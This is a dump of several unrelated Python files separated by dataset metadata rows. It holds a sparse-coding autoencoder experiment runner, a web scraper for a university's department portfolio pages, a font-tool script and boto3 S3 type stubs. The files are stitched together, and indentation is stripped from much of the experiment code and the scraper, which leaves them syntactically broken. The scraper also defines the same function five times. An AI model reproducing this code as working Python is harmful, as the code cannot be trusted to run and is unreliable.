Wd_noisy = np.expand_dims(np.flip(np.squeeze(We_noisy), axis=0), axis=2)
d_noisy = np.expand_dims(np.flip(np.squeeze(We_noisy), axis=0), axis=2)
We_noisy /= config_m["L"]
lcsc.set_weights(Wd_noisy, We_noisy, d_noisy)
################################################
if config_m["lambda_trainable"]:
lcsc.set_lambda(np.zeros(config_m["num_conv"]) + (1 / config_m["L"]))
else:
donoho_estimate = noiseSTD * np.sqrt(
2
* np.log(
config_m["num_conv"]
* (config_m["input_dim"] - config_m["dictionary_dim"] + 1)
)
)
lcsc.set_lambda(np.zeros(config_m["num_conv"]) + donoho_estimate)
################################################
# get lambda
print("lambda (regulariztion parameter) before training:", lcsc.get_lambda())
################################################
# get initial weights
Wd_initial = lcsc.get_Wd()
We_initial = lcsc.get_We()
d_initial = lcsc.get_d()
lambda_initial = lcsc.get_lambda()
################################################
# train
time = lcsc.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda (regulariztion parameter) after training:", lcsc.get_lambda())
################################################
# predict
print("do prediciton.")
z_test_hat = lcsc.encode(y_test_noisy)
y_test_hat = lcsc.denoise(y_test_noisy)
y_test_hat_separate = lcsc.separate(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/LCSC_results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat", data=y_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset(
"y_test_hat_separate",
data=y_test_hat_separate,
compression="gzip",
compression_opts=9,
)
g_ch.create_dataset("Wd_init", data=Wd_initial)
g_ch.create_dataset("We_init", data=We_initial)
g_ch.create_dataset("d_init", data=d_initial)
g_ch.create_dataset("lambda_init", data=lambda_initial)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def tlae_simulated(folder_name):
    """Run TLAE training and prediction on simulated data."""
    # load model parameters
    print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
    config_m = yaml.safe_load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
    config_d = yaml.safe_load(file)
file.close()
################################################
    # create TLAE object
    print("create TLAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = TLAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = TLAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = TLAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = TLAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"], config_m["max_lr"], config_m["step_size"]
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
# H_noisestd = 0
print(H_noisestd)
crsae.set_H(H_true, H_noisestd)
################################################
# get lambda
print("lambda before training:", crsae.get_lambda())
################################################
# get initial H
H_init = crsae.get_H()
# get initial lambda
lambda_init = crsae.get_lambda()
################################################
# train
time = crsae.train_and_save(y_train_noisy, folder_name)
################################################
# # save results
# time = crsae.save_results(folder_name)
################################################
# get lambda
print("lambda after training:", crsae.get_lambda())
################################################
# predict
print("do prediciton.")
z_test_hat = crsae.encode(y_test_noisy)
###############################################
# save prediction
print("save prediction results.")
hf = h5py.File(
"{}/experiments/{}/results/TLAE_results_prediction_{}.h5".format(
PATH, folder_name, time
),
"w",
)
g_ch = hf.create_group("{}".format(config_d["ch"]))
g_ch.create_dataset(
"z_test_hat", data=z_test_hat, compression="gzip", compression_opts=9
)
g_ch.create_dataset("H_init", data=H_init)
g_ch.create_dataset("lambda_init", data=lambda_init)
hf.close()
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_fista_iteration_test(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_test_noisy = np.array(hf.get("y_test_noisy"))
z_test = np.array(hf.get("z_test"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
crsae.set_H(H_true, 0)
z_test_hat = crsae.encode(y_test_noisy)
best_permutation_index = 0
file_number = config_m["num_iterations"]
plot_code_sim(
8,
z_test,
z_test_hat,
best_permutation_index,
PATH,
folder_name,
file_number,
config_d["sampling_rate"],
row=1,
line_width=2,
marker_size=15,
scale=4,
scale_height=0.5,
text_font=45,
title_font=45,
axes_font=48,
legend_font=32,
number_font=40,
)
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_csc_speed(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
config_m["delta"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["alpha"],
config_m["num_channels"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
crsae.set_H(H_true, 0)
z_train_hat = crsae.encode(y_train_noisy)
csc_times = []
for k in range(50):
csc_start_time = time.time()
z_train_hat = crsae.encode(y_train_noisy)
csc_times.append(time.time() - csc_start_time)
csc_time = np.mean(csc_times)
print(
"csc time: {} s for {} examples each {} length".format(
csc_time, y_train_noisy.shape[0], y_train_noisy.shape[1]
)
)
@run_experiment.command()
@click.option("--folder_name", default="", help="folder name in experiment directory")
def simulated_check_speed(folder_name):
# load model parameters
print("load model parameters.")
file = open(
"{}/experiments/{}/config/config_model.yml".format(PATH, folder_name), "rb"
)
config_m = yaml.load(file)
file.close()
# load data parameters
print("load data parameters.")
file = open(
"{}/experiments/{}/config/config_data.yml".format(PATH, folder_name), "rb"
)
config_d = yaml.load(file)
file.close()
################################################
# create CRsAE object
print("create CRsAE object.")
print_model_info(folder_name)
if config_m["data_space"] == 1:
if config_m["lambda_trainable"]:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_1d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["noiseSTD_lr"],
)
else:
if config_m["lambda_trainable"]:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["lambda_EM"],
config_m["delta"],
config_m["lambda_single"],
config_m["noiseSTD_lr"],
)
else:
crsae = CRsAE_2d(
config_m["input_dim"],
config_m["num_conv"],
config_m["dictionary_dim"],
config_m["num_iterations"],
config_m["L"],
config_m["twosided"],
config_m["lambda_trainable"],
config_m["alpha"],
config_m["num_channels"],
config_m["noiseSTD_trainable"],
config_m["noiseSTD_lr"],
)
################################################
# configure trainer
print("configure trainer.")
# trainer parameters
print_training_info(folder_name)
crsae.trainer.set_num_epochs(config_m["num_epochs"])
crsae.trainer.set_batch_size(config_m["batch_size"])
crsae.trainer.set_verbose(config_m["verbose"])
crsae.trainer.set_val_split(config_m["val_split"])
crsae.trainer.set_loss(config_m["loss"])
crsae.trainer.set_close(config_m["close"])
crsae.trainer.set_augment(config_m["augment"])
# optimizer
crsae.trainer.set_optimizer(config_m["optimizer"])
crsae.trainer.optimizer.set_lr(config_m["lr"])
# ADAM
if config_m["optimizer"] == "Adam":
if "beta_1" in config_m:
crsae.trainer.optimizer.set_beta_1(config_m["beta_1"])
if "beta_2" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["beta_2"])
if "decay" in config_m:
crsae.trainer.optimizer.set_beta_2(config_m["decay"])
crsae.trainer.optimizer.set_amsgrad(config_m["amsgrad"])
# SGD
elif config_m["optimizer"] == "SGD":
if "momentum" in config_m:
crsae.trainer.optimizer.set_momentum(config_m["momentum"])
if "decay" in config_m:
crsae.trainer.optimizer.set_decay(config_m["decay"])
if "nesterov" in config_m:
crsae.trainer.optimizer.set_nesterov(config_m["nesterov"])
if config_m["lambda_trainable"]:
crsae.trainer.optimizer.set_lambda_lr(config_m["lambda_lr"])
# add callbacks
print("add callbacks.")
crsae.trainer.add_best_val_loss_callback(config_m["loss_type"])
crsae.trainer.add_all_epochs_callback(config_m["loss_type"])
crsae.trainer.add_earlystopping_callback(
config_m["min_delta"], config_m["patience"], config_m["loss_type"]
)
if config_m["cycleLR"]:
if config_m["cycle_mode"] == "exp_range":
crsae.trainer.add_cyclic_lr_callback(
config_m["base_lr"],
config_m["max_lr"],
config_m["step_size"],
config_m["cycle_mode"],
config_m["gamma"],
)
################################################
# load data
print("load data.")
hf = h5py.File("{}/experiments/{}/data/data.h5".format(PATH, folder_name), "r")
y_train_noisy = np.array(hf.get("y_train_noisy"))
y_test_noisy = np.array(hf.get("y_test_noisy"))
noiseSTD = np.array(hf.get("noiseSTD"))
print("noiseSTD:", noiseSTD)
################################################
# build model knowing noiseSTD
crsae.build_model(noiseSTD)
# initialize filter
if crsae.trainer.get_close():
H_true = np.load("{}/experiments/{}/data/H_true.npy".format(PATH, folder_name))
H_noisestd = 0.5 * np.std(np.squeeze(H_true), axis=0)
print(H_noisestd)
flag = 1
while flag:
crsae.set_H(H_true, H_noisestd)
dist_true_learned, temp = get_err_h1_h2(H_true, crsae.get_H())
if np.max(dist_true_learned) <= 0.5:
flag = 0
print("initial distance err:", dist_true_learned)
################################################
# train
time = crsae.check_speed(y_train_noisy)
print(time)
if __name__ == "__main__":
run_experiment()
| 37.311939 | 87 | 0.537779 | 6,052 | 54,065 | 4.477032 | 0.045935 | 0.151393 | 0.040967 | 0.029747 | 0.912751 | 0.903709 | 0.89201 | 0.881823 | 0.870899 | 0.863997 | 0 | 0.00525 | 0.281328 | 54,065 | 1,448 | 88 | 37.337707 | 0.692086 | 0.04206 | 0 | 0.790524 | 0 | 0 | 0.198901 | 0.029613 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007481 | false | 0.000831 | 0.014963 | 0 | 0.022444 | 0.088113 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c19acd7e9731b28ff09b3953aa08cec87ea4f8b8 | 4,090 | py | Python | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | 1 | 2020-05-24T01:08:53.000Z | 2020-05-24T01:08:53.000Z | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | null | null | null | source/department_portfolio.py | tajes-523342342/Bot | f6d200698a7b86bc23d2f64b90fc1fb2d5f74914 | [
"Apache-2.0"
] | 3 | 2020-05-21T08:39:07.000Z | 2020-09-30T19:45:53.000Z | import requests
from dateutil.parser import parse
from bs4 import BeautifulSoup
def portfolio():
url = "http://nith.ac.in/portfolios/"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
table = soup.find_all('ul', {"class":"dropdown-menu"})
print("Enter \n 0)Architecture\n 1)Centre For Energy & Environmental\n 2)Material Science & Engineering\n 3)Chemical Engineering\n 4)Chemistry\n 5)Civil Engineering\n 6)Computer Science & Engineering\n 7)Electrical Engineering\n 8)Electronics & Communication Engineering\n 9)Humanities & Social Sciences\n 10)Mathematics & Scientific Computing\n 11)Mechanical Engineering \n 12)Physics & Photonics Science\n 13)Management Studies\n ")
t =int(input())
for element in table:
obj = {}
tds = element.findAll('li')
obj['link']=tds[t].contents[0]['href']
return obj['link']
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
def department_portfolio():
url = portfolio()
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html5lib')
portfolio_arr = []
c=0
table = soup.find_all('div' , {"id":"home"})
f= table[0].find_all('table', {"class":"profilemain"})
for table in f:
c +=1
for i in range(0,c):
print("\n")
table = soup.find_all('table', )[i].tbody.findAll('tr')
for element in table :
obj = {}
tds=element.findAll('td')
obj=tds[0].text +" : "+ tds[2].text
# portfolio_arr.append()
portfolio_arr.append(obj)
return portfolio_arr
| 35.258621 | 439 | 0.567237 | 521 | 4,090 | 4.381958 | 0.1881 | 0.049058 | 0.062637 | 0.077092 | 0.756023 | 0.756023 | 0.756023 | 0.756023 | 0.739816 | 0.716163 | 0 | 0.018868 | 0.274328 | 4,090 | 115 | 440 | 35.565217 | 0.750337 | 0 | 0 | 0.886792 | 0 | 0.009434 | 0.196364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.028302 | null | null | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c19c821351aa39b4e72a02f68cb2361b21aed408 | 177 | py | Python | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | 2 | 2019-12-18T16:12:07.000Z | 2019-12-21T01:19:23.000Z | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | hTools2.roboFontExt/lib/Scripts/selected glyphs/transform/scale.py | frankrolf/hTools2_extension | 9d73b8640c85209853a72f8d4b167768de5e0d60 | [
"BSD-3-Clause"
] | null | null | null | # [h] scale glyphs dialog
import hTools2.dialogs.glyphs.scale
import importlib
importlib.reload(hTools2.dialogs.glyphs.scale)
hTools2.dialogs.glyphs.scale.scaleGlyphsDialog()
| 22.125 | 48 | 0.824859 | 22 | 177 | 6.636364 | 0.454545 | 0.287671 | 0.410959 | 0.513699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018293 | 0.073446 | 177 | 7 | 49 | 25.285714 | 0.871951 | 0.129944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a9af4b6eec927e83102ef1db1636b7e4de88625d | 15,690 | py | Python | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations/boto3_type_annotations/s3/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from botocore.client import BaseClient
from typing import Callable
from typing import List
from typing import Optional
from typing import Dict
from boto3.s3.transfer import TransferConfig
from typing import Union
from botocore.paginate import Paginator
from datetime import datetime
from botocore.waiter import Waiter
from typing import IO
class Client(BaseClient):
def abort_multipart_upload(self, Bucket: str, Key: str, UploadId: str, RequestPayer: str = None) -> Dict:
pass
def can_paginate(self, operation_name: str = None):
pass
def complete_multipart_upload(self, Bucket: str, Key: str, UploadId: str, MultipartUpload: Dict = None, RequestPayer: str = None) -> Dict:
pass
def copy(self, CopySource: Dict = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, SourceClient: BaseClient = None, Config: TransferConfig = None):
pass
def copy_object(self, Bucket: str, CopySource: Union[str, Dict], Key: str, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, CopySourceIfMatch: str = None, CopySourceIfModifiedSince: datetime = None, CopySourceIfNoneMatch: str = None, CopySourceIfUnmodifiedSince: datetime = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, MetadataDirective: str = None, TaggingDirective: str = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, CopySourceSSECustomerAlgorithm: str = None, CopySourceSSECustomerKey: str = None, CopySourceSSECustomerKeyMD5: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def create_bucket(self, Bucket: str, ACL: str = None, CreateBucketConfiguration: Dict = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWrite: str = None, GrantWriteACP: str = None, ObjectLockEnabledForBucket: bool = None) -> Dict:
pass
def create_multipart_upload(self, Bucket: str, Key: str, ACL: str = None, CacheControl: str = None, ContentDisposition: str = None, ContentEncoding: str = None, ContentLanguage: str = None, ContentType: str = None, Expires: datetime = None, GrantFullControl: str = None, GrantRead: str = None, GrantReadACP: str = None, GrantWriteACP: str = None, Metadata: Dict = None, ServerSideEncryption: str = None, StorageClass: str = None, WebsiteRedirectLocation: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, SSEKMSKeyId: str = None, RequestPayer: str = None, Tagging: str = None, ObjectLockMode: str = None, ObjectLockRetainUntilDate: datetime = None, ObjectLockLegalHoldStatus: str = None) -> Dict:
pass
def delete_bucket(self, Bucket: str):
pass
def delete_bucket_analytics_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_cors(self, Bucket: str):
pass
def delete_bucket_encryption(self, Bucket: str):
pass
def delete_bucket_inventory_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_lifecycle(self, Bucket: str):
pass
def delete_bucket_metrics_configuration(self, Bucket: str, Id: str):
pass
def delete_bucket_policy(self, Bucket: str):
pass
def delete_bucket_replication(self, Bucket: str):
pass
def delete_bucket_tagging(self, Bucket: str):
pass
def delete_bucket_website(self, Bucket: str):
pass
def delete_object(self, Bucket: str, Key: str, MFA: str = None, VersionId: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def delete_object_tagging(self, Bucket: str, Key: str, VersionId: str = None) -> Dict:
pass
def delete_objects(self, Bucket: str, Delete: Dict, MFA: str = None, RequestPayer: str = None, BypassGovernanceRetention: bool = None) -> Dict:
pass
def delete_public_access_block(self, Bucket: str):
pass
def download_file(self, Bucket: str = None, Key: str = None, Filename: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def download_fileobj(self, Fileobj: IO = None, Bucket: str = None, Key: str = None, ExtraArgs: Dict = None, Callback: Callable = None, Config: TransferConfig = None):
pass
def generate_presigned_post(self, Bucket: str = None, Key: str = None, Fields: Dict = None, Conditions: List = None, ExpiresIn: int = None) -> Dict:
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
pass
def get_bucket_accelerate_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_acl(self, Bucket: str) -> Dict:
pass
def get_bucket_analytics_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_cors(self, Bucket: str) -> Dict:
pass
def get_bucket_encryption(self, Bucket: str) -> Dict:
pass
def get_bucket_inventory_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_lifecycle(self, Bucket: str) -> Dict:
pass
def get_bucket_lifecycle_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_location(self, Bucket: str) -> Dict:
pass
def get_bucket_logging(self, Bucket: str) -> Dict:
pass
def get_bucket_metrics_configuration(self, Bucket: str, Id: str) -> Dict:
pass
def get_bucket_notification(self, Bucket: str) -> Dict:
pass
def get_bucket_notification_configuration(self, Bucket: str) -> Dict:
pass
def get_bucket_policy(self, Bucket: str) -> Dict:
pass
def get_bucket_policy_status(self, Bucket: str) -> Dict:
pass
def get_bucket_replication(self, Bucket: str) -> Dict:
pass
def get_bucket_request_payment(self, Bucket: str) -> Dict:
pass
def get_bucket_tagging(self, Bucket: str) -> Dict:
pass
def get_bucket_versioning(self, Bucket: str) -> Dict:
pass
def get_bucket_website(self, Bucket: str) -> Dict:
pass
def get_object(self, Bucket: str, Key: str, IfMatch: str = None, IfModifiedSince: datetime = None, IfNoneMatch: str = None, IfUnmodifiedSince: datetime = None, Range: str = None, ResponseCacheControl: str = None, ResponseContentDisposition: str = None, ResponseContentEncoding: str = None, ResponseContentLanguage: str = None, ResponseContentType: str = None, ResponseExpires: datetime = None, VersionId: str = None, SSECustomerAlgorithm: str = None, SSECustomerKey: str = None, SSECustomerKeyMD5: str = None, RequestPayer: str = None, PartNumber: int = None) -> Dict:
pass
def get_object_acl(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_legal_hold(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_lock_configuration(self, Bucket: str) -> Dict:
pass
def get_object_retention(self, Bucket: str, Key: str, VersionId: str = None, RequestPayer: str = None) -> Dict:
pass
def get_object_tagging(self, Bucket: str, Key: str, VersionId: str = None) -> Dict:
pass
def get_object_torrent(self, Bucket: str, Key: str, RequestPayer: str = None) -> Dict:
pass
